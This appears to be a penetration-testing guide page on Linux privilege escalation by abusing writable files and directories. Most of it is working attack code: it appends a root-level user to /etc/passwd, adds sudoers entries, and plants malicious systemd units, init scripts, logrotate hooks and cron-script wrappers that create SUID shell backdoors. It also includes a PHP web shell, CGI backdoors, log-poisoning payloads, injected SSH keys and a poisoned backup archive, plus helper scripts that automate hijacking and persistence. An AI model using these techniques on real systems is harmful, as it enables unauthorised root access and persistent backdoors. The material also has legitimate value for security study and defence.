This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Writable files and directories abuse

Understanding Writable Files and Directories Exploitation

What Makes Writable Files Dangerous

Writable files and directories can be exploited when they contain configuration data, scripts, or other resources that privileged processes read or execute. By modifying these files, attackers can alter system behavior, inject malicious code, or escalate privileges through legitimate system processes that trust the modified content.

The Attack Principle: Exploit scenarios where:

  • Configuration files control privileged process behavior

  • Log files are processed by automated systems

  • Startup scripts and service configurations can be modified

  • Shared directories allow file replacement or injection

  • Backup files contain sensitive information or can be manipulated

Why This Works: Many services and applications read configuration files, process logs, or execute scripts with elevated privileges. If these files are writable by unprivileged users, malicious modifications can lead to privilege escalation. Two conditions must both hold: a privileged process actually consumes the file (a writable file nobody reads is just a finding), and the consumer does not reject it after your write (sudo, logrotate and sshd all refuse files with loose ownership or permissions, so check the consumer's rules before relying on the path).

Writable Files Discovery and Enumeration

Finding Writable Files and Directories

Basic Writable Discovery:

# Find world-writable files (mode bits only; /proc and /sys are pruned to cut noise)
find / \( -path /proc -o -path /sys \) -prune -o -type f -perm -002 -print 2>/dev/null

# Find world-writable directories; sticky-bit dirs like /tmp are expected, so skip them
find / \( -path /proc -o -path /sys \) -prune -o -type d -perm -002 ! -perm -1000 -print 2>/dev/null

# Find files writable by current user (-writable uses access(2), so it honours
# group membership and POSIX ACLs that -perm cannot see)
find / \( -path /proc -o -path /sys \) -prune -o -type f -writable -print 2>/dev/null

# Find directories writable by current user
find / \( -path /proc -o -path /sys \) -prune -o -type d -writable -print 2>/dev/null

Group-Writable Discovery:

# Find group-writable files
find / -type f -perm -020 2>/dev/null

# Find files writable by specific group
find / -type f -group groupname -perm -020 2>/dev/null

# Check current user's groups
groups
id

Focused Writable Search:

# Search in common configuration directories
find /etc -writable 2>/dev/null
find /var -writable 2>/dev/null
find /opt -writable 2>/dev/null

# Search for writable files in system directories
find /usr/local -writable 2>/dev/null
find /srv -writable 2>/dev/null
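Putting the discovery commands above together, as an added example that is not part of the original guide: the script below lists files writable by the current user under a root, says why each one is writable (world bit, group bit, ownership, or an ACL), marks paths that root-run tooling reads, and finds the cron, systemd, logrotate and init entries that reference a given file. It assumes GNU findutils and coreutils; the high-value path list and the configuration locations it searches are my choices.

```sh
#!/bin/sh
# Added example, not code from the original guide. Enumerates files writable by
# the current user under ROOT, says why each is writable, marks paths that
# root-run tooling consumes, and finds the cron/systemd/logrotate/init entries
# that reference a given file. Assumes GNU findutils and coreutils (stat -c,
# find -writable). The high-value list and config locations are my choices.

# classify_writable FILE -> world | group | owner | acl
# Mode bits first; a file with no group/other write bit that is still writable
# is either ours or granted through a POSIX ACL.
classify_writable() {
    mode=$(stat -c %a "$1")            # e.g. 664 or 4755, printed without a leading zero
    other=$(( mode % 10 ))
    group=$(( (mode / 10) % 10 ))
    if   [ $(( other & 2 )) -ne 0 ]; then echo world
    elif [ $(( group & 2 )) -ne 0 ]; then echo group
    elif [ -O "$1" ];                  then echo owner
    else                                    echo acl
    fi
}

# find_writable ROOT -> "CLASS PATH" per writable regular file. Pseudo
# filesystems are pruned: writes there do not persist or do not matter.
find_writable() {
    root=${1%/}
    find "${root:-/}" \( -path "$root/proc" -o -path "$root/sys" -o -path "$root/dev" -o -path "$root/run" \) -prune \
         -o -type f -writable -print 2>/dev/null |
    while IFS= read -r f; do
        printf '%s %s\n' "$(classify_writable "$f")" "$f"
    done
}

# is_high_value PATH -> 0 when the path is somewhere root reads configuration
# or scripts from (cron, systemd, init, logrotate, sudo, login, ssh, web server)
is_high_value() {
    case $1 in
        /etc/cron*|/etc/crontab|/etc/systemd/*|/usr/lib/systemd/*|/lib/systemd/*|\
        /etc/init.d/*|/etc/logrotate*|/etc/sudoers*|/etc/passwd|/etc/shadow|\
        /etc/ld.so.*|/etc/profile*|/etc/bash.bashrc|/etc/environment|/etc/ssh/*|\
        /etc/apache2/*|/etc/nginx/*) return 0 ;;
        *) return 1 ;;
    esac
}

# references_to FILE [CONFIG_ROOT] -> config files that mention FILE. A writable
# file that no privileged job reads, runs or restores is not an escalation path.
references_to() {
    r=${2:-}
    grep -rlF -- "$1" "$r/etc/crontab" "$r/etc/cron.d" "$r/etc/cron.hourly" "$r/etc/cron.daily" \
        "$r/etc/systemd" "$r/etc/logrotate.d" "$r/etc/init.d" 2>/dev/null
}

# report ROOT -> one line per file: H for a high-value location, then class, then path
report() {
    root=${1%/}
    find_writable "$1" | while read -r class path; do
        rel=${path#"$root"}             # path as it would appear on the real system
        if is_high_value "$rel"; then mark=H; else mark=-; fi
        printf '%s %-5s %s\n' "$mark" "$class" "$path"
    done
}

# Against the live system:  sh enum_writable.sh --run | grep '^H'
if [ "${1:-}" = "--run" ]; then report /; fi
```

Run it with --run and read the H lines first, then feed each interesting path to references_to to see which privileged job actually consumes it; "group" and "acl" hits are the ones a quick ls -l audit tends to miss.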

High-Value Writable File Targets

Configuration File Abuse

System Configuration Files:

# Check for writable system configs
ls -la /etc/passwd /etc/shadow /etc/sudoers 2>/dev/null
ls -la /etc/crontab /etc/hosts /etc/hostname 2>/dev/null

# Find writable config files in /etc
find /etc -type f -writable 2>/dev/null | head -20

# Check service configuration directories
find /etc/systemd -writable 2>/dev/null
find /etc/init.d -writable 2>/dev/null

Application Configuration Exploitation:

# If /etc/passwd is writable (rare but critical). The second field must hold a
# real hash: 'x' defers to /etc/shadow, where the new user has no entry and
# cannot log in
openssl passwd -6 'Password123'       # prints a $6$... hash
echo 'hacker:$6$<hash from above>:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker

# If sudoers file or sudoers.d directory is writable. Caveat: sudo ignores
# sudoers files that are not owned by root or that are world-writable (or
# group-writable by a non-root group), so a file you create in sudoers.d is
# skipped and a world-writable /etc/sudoers is rejected outright. Confirm
# with sudo -l before counting on it
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
echo 'username ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers.d/hacker
sudo -l

# If hosts file is writable: point a name that a privileged process fetches
# from (package mirror, internal API, update server) at a listener you control
echo '127.0.0.1 trusted-domain.com' >> /etc/hosts

Service Configuration Abuse

Systemd Service Modification:

# Check for writable systemd service files
find /etc/systemd/system -writable 2>/dev/null
find /usr/lib/systemd/system -writable 2>/dev/null

# If an existing unit file is writable, edit its ExecStart: it is already
# enabled and trusted. If /etc/systemd/system itself is writable, drop a new unit
echo '[Unit]
Description=Malicious Service
[Service]
Type=oneshot
ExecStart=/bin/bash -c "cp /bin/bash /tmp/service_backdoor; chmod 4755 /tmp/service_backdoor"
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/malicious.service

# daemon-reload and enable need root. If multi-user.target.wants is writable
# too, create the symlink enable would have made; the unit then runs at the
# next boot (or when root reloads and starts it)
systemctl daemon-reload
systemctl enable malicious.service
ln -s /etc/systemd/system/malicious.service /etc/systemd/system/multi-user.target.wants/malicious.service

# /tmp is often mounted nosuid, which silently neuters the 4755 copy; check first
findmnt -no OPTIONS -T /tmp

Init Script Modification:

# If init scripts are writable
find /etc/init.d -writable 2>/dev/null

# Modify existing init script. Put the payload right after the shebang: a line
# appended at the end may sit after an exit or inside a case block and never
# run. Write in place with cat >, not sed -i: sed -i replaces the file, which
# needs a writable directory and hands the new file to your uid
sed '1a cp /bin/bash /tmp/init_backdoor; chmod 4755 /tmp/init_backdoor' /etc/init.d/writable_service > /tmp/svc.new
cat /tmp/svc.new > /etc/init.d/writable_service

Log File Abuse

Log Injection and Processing:

# Find writable log files
find /var/log -writable 2>/dev/null

# Log content only runs if something executes or includes it. Poisoning the
# Apache access log pays off when a PHP script includes the log (LFI); direct
# write access just saves you the User-Agent trick. The code then runs as the
# web server user, so the 4755 copy is SUID www-data, not root
echo '<?php system("cp /bin/bash /tmp/log_backdoor; chmod 4755 /tmp/log_backdoor"); ?>' >> /var/log/apache2/access.log

# If syslog is writable and a root-run script feeds lines to eval or an
# unquoted sh -c, the backticks execute during processing. Find such a
# consumer first (grep cron jobs and scripts for the log path); without one
# this line is just noise in the log
echo 'Dec 25 12:00:00 hostname logger: `cp /bin/bash /tmp/syslog_backdoor; chmod 4755 /tmp/syslog_backdoor`' >> /var/log/syslog

Log Rotation Exploitation:

# Check logrotate configuration
find /etc/logrotate.d -writable 2>/dev/null

# If a logrotate config is writable: postrotate runs as root from the daily
# cron job. Caveats: logrotate skips config files that are group- or
# world-writable or not owned by root (so a file you create yourself is
# ignored), the log must exist, and its directory must not be world-writable
# or the entry is skipped as insecure. Check ls -l on both before waiting a day
echo '/var/log/malicious.log {
    daily
    rotate 1
    postrotate
        cp /bin/bash /tmp/logrotate_backdoor
        chmod 4755 /tmp/logrotate_backdoor
    endscript
}' > /etc/logrotate.d/malicious

Application-Specific File Abuse

Web Application Files

Web Root Modification:

# Find writable web directories
find /var/www -writable 2>/dev/null
find /usr/share/nginx -writable 2>/dev/null

# If web root is writable: the shell runs as the web server user (usually
# www-data), so this is a foothold on the box, not root by itself
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php

# If .htaccess is writable (Apache). Options and handlers in .htaccess are
# ignored under AllowOverride None and cause a 500 when the directive is not
# permitted, so this needs AllowOverride Options (or All) and mod_cgi loaded
echo 'Options +ExecCGI
AddHandler cgi-script .sh
<Files "shell.sh">
SetHandler cgi-script
</Files>' > /var/www/html/.htaccess

echo '#!/bin/bash
echo "Content-Type: text/html"
echo
cp /bin/bash /tmp/web_backdoor
chmod 4755 /tmp/web_backdoor' > /var/www/html/shell.sh
chmod +x /var/www/html/shell.sh
# The result is SUID www-data: good for pivoting, not for root

SSH Configuration Abuse

SSH Config Modification:

# Check SSH configuration files
ls -la /etc/ssh/sshd_config /etc/ssh/ssh_config
find /etc/ssh -writable 2>/dev/null

# If sshd_config is writable. sshd uses the FIRST value it reads for a keyword,
# and newer configs Include sshd_config.d/*.conf before anything else, so lines
# appended at the end are overridden by earlier ones and may even land inside a
# Match block. Insert at line 1 (or into a writable sshd_config.d/), writing in
# place so the file keeps its root ownership
{ printf 'PermitRootLogin yes\nPasswordAuthentication yes\nPermitEmptyPasswords yes\n'; cat /etc/ssh/sshd_config; } > /tmp/sshd.new
cat /tmp/sshd.new > /etc/ssh/sshd_config
# Takes effect only when root restarts sshd or the host reboots

# If a user's .ssh directory or authorized_keys is writable. With the default
# StrictModes yes, sshd refuses keys from a file or directory that is group- or
# world-writable or not owned by that user or root, so a file you create in
# someone else's ~/.ssh is rejected unless StrictModes is off
mkdir -p /root/.ssh
echo 'ssh-rsa YOUR_PUBLIC_KEY_HERE' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Shared Directory Exploitation

Shared Application Directories

Application Data Directory Abuse:

# Find shared application directories
find /opt -type d -writable 2>/dev/null
find /usr/local -type d -writable 2>/dev/null

# If application data directory is writable
# Replace legitimate files with malicious ones. Renaming needs only write
# permission on the directory, so this works even when script.sh itself is
# read-only; the wrapper exec's the original so the caller sees no change.
# The 4755 copy is only root if the script runs as root (cron, a service)
mv /opt/application/script.sh /opt/application/script.sh.bak
echo '#!/bin/bash
cp /bin/bash /tmp/app_backdoor
chmod 4755 /tmp/app_backdoor
exec /opt/application/script.sh.bak "$@"' > /opt/application/script.sh
chmod +x /opt/application/script.sh
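The rename-and-wrap technique above as a reusable function, added here as an example and not code from the original guide. It refuses to double-hijack, keeps the original under a hidden name, and runs the payload in a subshell so a payload failure cannot stop the exec of the original; the payload string and the hidden-name convention are my choices.

```sh
#!/bin/sh
# Added example, not code from the original guide: hijack a script that lives
# in a directory we can write to, even when the script itself is read-only.
# Renaming needs write+execute on the directory (and no sticky bit), so the
# original is moved aside and a wrapper takes its name. The wrapper runs the
# payload, then exec's the original with the caller's argv, environment and
# cwd intact, so cron/systemd/whatever invokes it notices nothing.
# PAYLOAD is an arbitrary shell command string chosen by the caller.

# hijack_script TARGET PAYLOAD -> 0 on success, 1 if not possible
hijack_script() {
    target=$1; payload=$2
    dir=$(dirname "$target"); base=$(basename "$target")
    orig="$dir/.$base.orig"                 # hidden name keeps ls output unremarkable

    [ -w "$dir" ] || { echo "directory not writable: $dir" >&2; return 1; }
    [ -e "$orig" ] && { echo "already hijacked: $orig exists" >&2; return 1; }

    mv -- "$target" "$orig" || return 1      # works even if $target is mode 555
    cat > "$target" <<EOF
#!/bin/sh
( $payload ) >/dev/null 2>&1
exec "$orig" "\$@"
EOF
    chmod +x "$target"
}

# unhijack_script TARGET -> put the original back
unhijack_script() {
    dir=$(dirname "$1"); base=$(basename "$1")
    mv -f -- "$dir/.$base.orig" "$1"
}
```

Usage on a target would be hijack_script /opt/application/script.sh 'cp /bin/bash /tmp/app_backdoor; chmod 4755 /tmp/app_backdoor'; the wrapper is owned by you, which matters only if the consumer checks ownership (cron and systemd do not).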

Backup and Archive Abuse

Backup File Manipulation

Backup Directory Exploitation:

# Find backup directories
find / -type d -name "*backup*" -writable 2>/dev/null
find / -type d -name "*bak*" -writable 2>/dev/null

# If backup directory is writable and a root job restores from it: build an
# archive whose member paths land on the target when extracted at /. Mirror
# the layout in a staging tree; GNU tar strips leading "/" and "../" from
# member names on extraction, so --transform traversal tricks only work
# against a restore that passes -P (--absolute-names)
mkdir -p /tmp/stage/etc
cp /etc/passwd /tmp/stage/etc/passwd
echo 'hacker:$6$salt$hash:0:0:root:/root:/bin/bash' >> /tmp/stage/etc/passwd
tar -czf /backup/system_backup.tar.gz -C /tmp/stage etc/passwd

# Read the restore job first: the archive name and member paths must match
# what it extracts, and where
grep -r 'tar ' /etc/cron* 2>/dev/null

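Building the archive the way a root restore will consume it, as an added example that is not from the original guide: the helper below stages the target file under its real path, packs it with relative member names, and a second function replays the assumed restore command (tar -xzf ARCHIVE -C /) into a scratch root so the landing spot can be confirmed before planting anything. The /backup path, the restore command and the sample passwd content are assumptions.

```sh
#!/bin/sh
# Added example, not code from the original guide. Creates a backup archive
# whose members overwrite a chosen file when a privileged job extracts it at
# the filesystem root (assumed restore: tar -xzf ARCHIVE -C /). The archive is
# assembled from a staging tree that mirrors the real layout, so no "../"
# trick is needed; tar drops leading "/" and "../" from member names on a
# default extraction, which is why --transform traversal fails against it.

# build_poisoned_backup ARCHIVE TARGET_PATH CONTENT_FILE
#   TARGET_PATH is the absolute path the restore should overwrite (e.g. /etc/passwd)
build_poisoned_backup() {
    archive=$1; target=$2; content=$3
    stage=$(mktemp -d) || return 1
    mkdir -p "$stage$(dirname "$target")"
    cp -- "$content" "$stage$target"
    # -C makes the member name relative ("etc/passwd"): exactly what -C / restores in place
    tar -czf "$archive" -C "$stage" "${target#/}"
    rm -rf "$stage"
}

# list_members ARCHIVE -> member names, to confirm the layout before planting it
list_members() { tar -tzf "$1"; }

# restore_into ROOT ARCHIVE -> what the privileged job would do, pointed at ROOT
restore_into() {
    mkdir -p "$1" && tar -xzf "$2" -C "$1"
}
```

Always dry-run with restore_into against a scratch directory: if the members come out under etc/ rather than at the top level, the restore job's -C argument decides whether they land on /etc/passwd or somewhere harmless.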
Real-World Exploitation Examples

Example 1: Writable Systemd Service Directory

Discovery:

# Found writable systemd directories (the unit search path and the wants dir)
find /etc/systemd/system -type d -writable 2>/dev/null
# Output: /etc/systemd/system
# Output: /etc/systemd/system/multi-user.target.wants

Exploitation:

# Create malicious service
echo '[Unit]
Description=System Update Service
After=network.target

[Service]
Type=oneshot
ExecStart=/bin/bash -c "cp /bin/bash /tmp/systemd_backdoor; chmod 4755 /tmp/systemd_backdoor"
RemainAfterExit=true

[Install]
WantedBy=multi-user.target' > /etc/systemd/system/system-update.service

# systemctl enable needs root; create the symlink it would have created.
# systemd resolves the dependency by the symlink's name, so a unit with that
# name must exist in the search path (here /etc/systemd/system)
ln -s /etc/systemd/system/system-update.service /etc/systemd/system/multi-user.target.wants/system-update.service

# The unit runs at the next boot or when root runs daemon-reload and start.
# Make sure /tmp is not mounted nosuid first, or the 4755 bit is ignored
findmnt -no OPTIONS -T /tmp

# Access backdoor: -p stops bash from dropping the effective uid
/tmp/systemd_backdoor -p
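The manual enabling step and the nosuid check, as an added example that is not part of the original guide (it also covers the systemd service modification section earlier on this page). The script writes a oneshot unit and the multi-user.target.wants symlink itself, and derives the payload only after confirming the drop directory is not on a nosuid mount, resolving the mount the way the kernel does (longest matching mount point). ROOT is a prefix so the functions can be exercised against a scratch tree; the unit name, payload path and the optional mounts-file argument are my choices.

```sh
#!/bin/sh
# Added example, not code from the original guide. Plants a oneshot unit and
# the multi-user.target.wants symlink by hand (what "systemctl enable" does,
# without needing root), and refuses to aim the SUID copy at a directory on a
# nosuid mount. ROOT is a prefix for testing against a scratch tree; on a real
# target it is "". Unit name, payload path and the mounts-file parameter are
# my choices, not something the guide specifies.

# nosuid_mount PATH [MOUNTS_FILE] -> 0 if the mount holding PATH has nosuid.
# The longest mount point that prefixes PATH wins, as in the kernel's lookup.
nosuid_mount() {
    path=$1; mounts=${2:-/proc/mounts}
    best=""; bestopts=""
    while read -r _dev mp _fs opts _rest; do
        case "$path" in
            "$mp"|"$mp"/*|"${mp%/}"/*)
                if [ ${#mp} -gt ${#best} ]; then best=$mp; bestopts=$opts; fi ;;
        esac
    done < "$mounts"
    case ",$bestopts," in *,nosuid,*) return 0 ;; *) return 1 ;; esac
}

# suid_payload DIR [MOUNTS_FILE] -> the command the unit should run as root
suid_payload() {
    if nosuid_mount "$1" "${2:-/proc/mounts}"; then
        echo "$1 is on a nosuid mount; a 4755 shell there is useless" >&2
        return 1
    fi
    printf 'cp /bin/bash %s/.sh; chmod 4755 %s/.sh' "$1" "$1"
}

# plant_unit ROOT NAME CMD -> unit file in the search path plus the wants symlink
plant_unit() {
    root=${1%/}; name=$2; cmd=$3
    unitdir="$root/etc/systemd/system"
    wants="$unitdir/multi-user.target.wants"
    [ -w "$unitdir" ] && [ -w "$wants" ] || { echo "need write on $unitdir and $wants" >&2; return 1; }
    cat > "$unitdir/$name.service" <<EOF
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=oneshot
ExecStart=/bin/sh -c '$cmd'
RemainAfterExit=true

[Install]
WantedBy=multi-user.target
EOF
    # systemd looks the dependency up by the symlink's NAME, so the target must
    # be the unit's location inside the search path, not a copy somewhere else.
    ln -sf "/etc/systemd/system/$name.service" "$wants/$name.service"
}
```

On a live host: plant_unit "" system-update "$(suid_payload /opt)" and then wait for a reboot; once the copy exists, run it with -p so bash keeps the effective uid.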

Example 2: Writable Log Directory

Discovery:

# Found writable log directory
find /var/log -type d -writable 2>/dev/null
# Output: /var/log/app_logs

Exploitation:

# Log data is only dangerous if a privileged process executes or includes it.
# Find the consumer first (cron job, service, processing script) and read how
# it handles the files; logrotate itself never runs a log as a script
grep -rl '/var/log/app_logs' /etc/cron* /etc/systemd /etc/logrotate.d /opt 2>/dev/null

# Hypothetical case: a root cron job runs or sources every *.log it finds there
echo '#!/bin/bash
cp /bin/bash /tmp/log_processing_backdoor
chmod 4755 /tmp/log_processing_backdoor' > /var/log/app_logs/malicious.log
chmod +x /var/log/app_logs/malicious.log

# Wait for the processing job, then access the backdoor
/tmp/log_processing_backdoor -p

Example 3: Writable Web Configuration

Discovery:

# Found writable web config
ls -la /etc/apache2/sites-enabled/
# Output: -rw-rw-r-- 1 root web 1234 Dec 25 12:00 000-default.conf

Exploitation:

# Modify Apache configuration. Alias alone maps the URL to a file without
# making it a CGI, and /tmp is denied by the default <Directory />, so use
# ScriptAlias and grant access. mod_cgi (or mod_cgid) must be loaded or the
# handler does nothing: ls /etc/apache2/mods-enabled/ | grep cgi
echo 'ScriptAlias /backdoor /tmp/web_backdoor.cgi
<Directory "/tmp">
    Require all granted
</Directory>' >> /etc/apache2/sites-enabled/000-default.conf

# A syntax error takes the whole server down on reload, so check first
apache2ctl -t

# Create CGI backdoor. It runs as the web server user (typically www-data),
# so the 4755 copy is SUID www-data, not root
echo '#!/bin/bash
echo "Content-Type: text/html"
echo
cp /bin/bash /tmp/apache_backdoor
chmod 4755 /tmp/apache_backdoor
echo "Backdoor created"' > /tmp/web_backdoor.cgi
chmod +x /tmp/web_backdoor.cgi

# Reload needs root. On Debian/Ubuntu the apache2 logrotate job reloads the
# server in its postrotate step, so the change is picked up daily without it
systemctl reload apache2

Key Operational Considerations

Success Indicators

  • Writable configuration files discovered in critical directories

  • Service configurations successfully modified

  • Log processing systems accepting malicious input

  • Privilege escalation achieved through file modification

Common Failure Points

  • Proper file permissions preventing write access

  • File integrity monitoring detecting modifications

  • Service validation rejecting malformed configurations

  • Automated restoration reverting file changes

Exploitation Notes

  • Development environments often have relaxed file permissions

  • Custom applications may create writable config files

  • Backup directories frequently overlooked in permission audits

  • Log directories sometimes writable for application convenience

Writable files and directories abuse is particularly effective in environments where file permissions are not strictly controlled, offering multiple paths to privilege escalation and persistence.
